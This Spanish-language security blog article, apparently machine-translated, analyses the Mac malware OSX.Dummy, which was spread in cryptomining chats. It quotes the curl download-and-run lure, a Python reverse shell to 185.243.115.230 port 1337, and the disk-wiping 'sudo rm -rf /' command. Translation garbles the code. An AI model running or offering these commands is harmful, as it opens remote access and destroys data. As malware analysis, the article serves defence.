El malware de Mac se dirige a los usuarios de cryptomining

El malware de Mac se dirige a los usuarios de cryptomining

 

La semana pasada, un investigador de seguridad llamado Remco Verhoef anunció el descubrimiento de una nueva pieza de malware de Mac que se distribuye en los grupos de chat cryptomining. Este malware luego fue analizado por Patrick Wardle , quien le dio el apodo apropiado OSX.Dummy.

El malware fue distribuido por usuarios de chat que se hicieron pasar por administradores, quienes publicaron el siguiente script de shell para que los usuarios puedan ejecutar:

cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

Este script descarga un archivo ejecutable llamado script de un sitio malicioso, le otorga permisos ejecutables y luego lo inicia. Este script tiene un tamaño ridículo de 34 megabytes, y parece que no hace más que crear un archivo de script de shell y un demonio de inicio para que siga funcionando.

El script de shell usa Python para abrir un shell inverso al puerto 1337 en un servidor malicioso, lo que le da al pirata informático el acceso continuo a la computadora.

#! / bin / bash
mientras :
hacer
  python -c 'socket de importación, subproceso, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect (("185.243.115.230", 1337)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call (["/ bin / sh", "- i"]); '
  dormir 5
hecho

En general, este malware no es particularmente excepcional, y hace honor al nombre OSX.Dummy de múltiples maneras. Sin embargo, hay algunas cosas interesantes que destacar sobre este malware.

Riesgos planteados por los guiones publicados

El método de distribución es interesante. Las personas en los foros y otras fuentes en línea han estado dando instrucciones que implican ejecutar comandos en la línea de comandos, en la Terminal en una Mac, durante muchos años, y todavía lo hacen hoy.

Como ejemplo, un usuario en los foros de Apple solía dar a los usuarios un comando de shell altamente ofuscado que constaba de decenas de miles de caracteres, con instrucciones para copiarlo y pegarlo en la Terminal para ejecutarlo. Esta secuencia de comandos fue ejecutada por los usuarios de los foros y el resultado del script publicado allí, miles de veces.

Afortunadamente, este script no fue malicioso, pero podría haberlo sido fácilmente, y su naturaleza ofuscada debería haber despertado sospechas. Sí, los usuarios todavía lo ejecutaron, sin entender lo que hacía, porque confiaban en un extraño en un foro.

Hubo otros casos en el pasado de que se publicaron scripts que eran realmente de naturaleza maliciosa. El más conocido de estos fue un truco infame donde los usuarios debían ejecutar el siguiente comando para resolver cualquier problema que tuvieran:

sudo rm -rf /

Desafortunadamente para los usuarios que realmente siguieron instrucciones como estas, este comando realmente borra el disco duro.

Por lo tanto, hay un precedente de sospecha de las secuencias de comandos de shell publicadas en línea, pero aun así, muchas personas seguirán ejecutando scripts muy sospechosos sin ningún cuidado. Se alienta a los lectores a educar a los usuarios sobre los peligros de este comportamiento en cada oportunidad.

Riesgos planteados por infecciones previas

Cuando se ejecuta por primera vez, el script ejecutable solicita una contraseña. Esto se parece al comportamiento de sudo estándar en la línea de comandos, pero en realidad, el malware recibe la contraseña. El malware crea un par de pequeños archivos de datos llamados dumpdummy- one en / Users / Shared / y uno en / tmp / –y almacena la contraseña allí, presumiblemente para un posible uso futuro.

Tener su contraseña almacenada en texto claro dentro de un archivo que pueda ser leída por cualquier persona en la computadora representa una seria amenaza a la seguridad. Peor aún, dado que este archivo solo es información y no es realmente malicioso, es probable que la mayoría del software antivirus no lo detecte. Esto significa que puede haber eliminado la infección, pero el archivo dumpdummypermanece, lo que representa un posible riesgo de seguridad en el futuro.

Esto dista mucho de la primera vez que el malware ha hecho tales cosas. Esto significa que, incluso si su computadora no está infectada actualmente, es muy posible que su contraseña se pueda encontrar en texto claro en algún lugar de su disco duro, como un remanente de una infección anterior. El futuro malware podría estar diseñado para encontrar las ubicaciones de estos archivos creados por el malware anterior, obteniendo acceso a su contraseña de forma gratuita.

Malwarebytes para Mac eliminará dichos rastreos además de los ejecutables maliciosos.

Riesgos planteados por el malware sin firmar

La mayoría, aunque no todos, del malware de Mac en la actualidad está firmado criptográficamente con un certificado emitido por Apple. Estos certificados no son difíciles de obtener, ya que no cuestan más de $ 99 para obtener una cuenta de desarrollador con Apple. Lo bueno de esto es que una vez que el malware es detectado por Apple, el certificado puede ser revocado, matando al malware.

Sin embargo, hay algunos problemas con la forma en que macOS maneja la firma de código, y esto no se puede confiar. Como señaló Wardle en su análisis, el hecho de que este malware no esté firmado es irrelevante, ya que macOS no verifica la firma del código para un proceso que se ejecuta desde la línea de comando.

Se presentará más información sobre cómo la firma de códigos puede ser un problema en macOS en la conferencia Virus Bulletin de este año.

Objetivo: robo de criptomonedas

En general, es poco probable que este malware esté muy extendido, y probablemente sabrá si se ha infectado después de leer una descripción del malware.

Todavía no sabemos exactamente qué pueden querer hacer los hackers detrás del malware con el acceso a las máquinas infectadas, pero dado el hecho de que las comunidades mineras de criptomonedas fueron atacadas, es una apuesta segura que estaban interesados ​​en el robo de criptomonedas. .

Si cree que puede estar infectado, Malwarebytes eliminará el malware, incluidos los archivos dumpdummy que contienen su contraseña.

Si realiza tareas de seguridad o TI para una empresa, asegúrese de bloquear el acceso a la dirección IP a la que la secuencia de comandos intentará conectarse (185.243.115.230).

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.